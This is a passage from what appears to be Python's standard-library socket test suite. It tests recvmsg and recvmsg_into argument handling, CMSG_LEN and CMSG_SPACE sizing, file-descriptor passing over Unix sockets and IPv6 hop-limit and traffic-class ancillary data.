self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
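# A hedged sketch of the CMSG_LEN()/CMSG_SPACE() relationship that
# CmsgMacroTests above relies on: for an n-byte payload,
# n + CMSG_LEN(0) <= CMSG_LEN(n) <= CMSG_SPACE(n), with CMSG_SPACE() also
# accounting for trailing alignment padding.  Guarded with hasattr() because
# neither macro is available on all platforms; illustrative only and never
# called by the test runner.
def _example_cmsg_sizes(n=None):
    if not (hasattr(socket, "CMSG_LEN") and hasattr(socket, "CMSG_SPACE")):
        return None
    if n is None:
        n = array.array("i").itemsize   # size of one C int (e.g. one fd)
    assert socket.CMSG_LEN(n) >= n + socket.CMSG_LEN(0)
    assert socket.CMSG_SPACE(n) >= socket.CMSG_LEN(n)
    return socket.CMSG_LEN(n), socket.CMSG_SPACE(n)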
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except socket.error as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
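# A hedged sketch of how an SCM_RIGHTS payload is packed and unpacked, as
# done by createAndSendFDs()/closeRecvmsgFDs() in SCMRightsTest above: the
# cmsg_data is simply the native bytes of an array of C ints, and any
# trailing partial int (left over after truncation) is dropped before
# decoding.  The fd values here are made up; illustrative only and never
# called by the test runner.
def _example_scm_rights_payload(fds=(3, 4, 5)):
    packed = array.array("i", fds).tobytes()
    decoded = array.array("i")
    decoded.frombytes(packed[:len(packed) - (len(packed) % decoded.itemsize)])
    assert list(decoded) == list(fds)
    return packed, list(decoded)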
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except socket.error as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
